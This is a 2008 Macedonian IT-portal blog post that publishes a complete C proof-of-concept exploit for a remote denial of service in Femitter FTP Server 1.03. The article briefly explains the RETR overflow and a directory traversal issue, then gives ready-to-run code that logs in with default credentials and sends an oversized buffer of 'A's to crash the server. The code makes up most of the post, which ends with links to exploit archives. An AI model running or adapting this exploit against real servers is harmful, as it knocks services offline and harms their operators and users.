IT.com.mk - Македонски ИТ портал - Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

Автор: Ѓоко Крстиќ
Објавено на: 02.10.2008
Acritum Femitter HTTP/FTP Server (http://acritum.com/fem/index.htm) е ранлив на DoS напад со кој се оневозможува пристап до серверот односно доаѓа до "падање" на серверот со успешна експлоатација. Ја најдов слабоста одамна и експлоитот е веќе јавно достапен но еве зошто да го нема и тука. :) Да не должам многу, се работи за ранлива команда RETR која служи за испраќање на податоци од страна на серверот. Доколку испратиме премногу аргументи на командата доаѓа до DoS напад. Исто така зборуваме за повеќе слабости кај овој софтвер како корупција на меморија, Directory Traversal и сл. Следува доказ на концептот: -----------------------------------------C код----------------------------------------- /0-----------------------------------------------------------------------------------0\ 0 0 \| \| \| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC \| \| \| \| Summary: Femitter Server is an easy-to use HTTP and FTP server application \| \| for Windows which allows you to use your own computer for sharing gigabytes \| \| of files with your friends and colleagues. \| \| \| \| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability \| \| and memory corruption that causes the application to crash. When we send to \| \| the RETR command an argument like AAAA:AAAA or an overly long string of As \| \| (1024), the server crashes instantly. Also, when typing into browser: \| \| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), \| \| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at \| \| address 004A218A in module "fem.exe". Write of address 00000000. \| \| \| \| Producst web page: http://acritum.com/fem/index.htm \| \| \| \| Tested on Microsoft Windows XP SP2 (English) \| \| \| \| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \| \| \| \| liquidworm [t00t] gmail.com \| \| \| \| http://www.zeroscience.org/ \| \| \| \| 17.09.2008 \| \| \| 0 0 \0-----------------------------------------------------------------------------------0/ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <netdb.h> #define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA" void header(void); int main (int argc, char argv[]) { int sckt = 0, sfd = 0; char user[] = "USER admin\r\n"; char pass[] = "PASS nimda\r\n"; unsigned char payload[]= "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\xD\xA"; header(); if(argc != 3) { printf("\nUsage: %s [ip] [port]\n\n", argv[0]); return (EXIT_SUCCESS); } struct sockaddr_in dos_ftp; sfd = socket(AF_INET, SOCK_STREAM, 0); if(sfd < 0) { perror("Socket"); printf("Error creating socket...\n"); return(1); } printf("\n\n[+] Socket created!\n"); sleep (1); memset(&dos_ftp, 0x0, sizeof(dos_ftp)); dos_ftp.sin_family = AF_INET; dos_ftp.sin_addr.s_addr = inet_addr(argv[1]); dos_ftp.sin_port = htons(atoi(argv[2])); sckt = connect(sfd, (struct sockaddr ) &dos_ftp, sizeof(dos_ftp)); if(sckt < 0) { perror("Connect"); printf("Error connecting...\n"); return(1); } printf("[+] Connection established!\n"); sleep (1); write(sfd, user, strlen(user)); // username printf("[+] Sending CMD: %s\n", user); sleep (2); write(sfd, pass, strlen(pass)); // password printf("[+] Sending CMD: %s\n", pass); sleep (2); printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]); sleep(2); send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0); printf("[+] Malicious buffer succesfully sent...\n"); sleep (1); printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]); close (sfd); return(0); } void header() { printf("\n********************************************************************\n\n"); printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n"); printf("\t\t\tby LiquidWorm \n\n"); printf("*******************************************************************\n\n"); } -----------------------------------------C код-----------------------------------------* Експлоатација на Femitter FTP Server Референти: - http://www.milw0rm.com/exploits/6481 - http://www.securityfocus.com/bid/31226 - http://www.securitylab.ru/poc/extra/359669.php - http://www.sebug.net/exploit/4658/ - http://www.packetstormsecurity.org/filedesc/fermitter-dos.txt.html - http://www.emagined.com/security_exploits_article.php?target=6481.html - http://forum.blackhack.ru/showthread.php?t=2650 - http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6583 - http://securityreason.com/exploitalert/4715 - http://www.zeroscience.org/codes/femitter-dos.c Клучни зборови: Femitter FTP Server DoS Експлоит Exploit PoC RETR Слабост Directory Traversal

Сподели:

Последни написи на Ѓоко

Mozilla: Проверете ги вашите плагини
објавено на 21.10.2009 во Интернет

Во соработка со Adobe Product Security Incident Response Team (PSIRT)
објавено на 24.08.2009 во Сигурност

Збогување со milw0rm.com
објавено на 08.07.2009 во Интернет

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

Првиот сајт

Првиот веб сајт е создаден со HTML код на 6 Август, 1991 од страна на Тим Бернерс-Ли. На сајтот биле објавени информации за тоа што е WWW и како се користи. Сајтот изгледал нешто слично на ова.

Нема настани во наредните денови.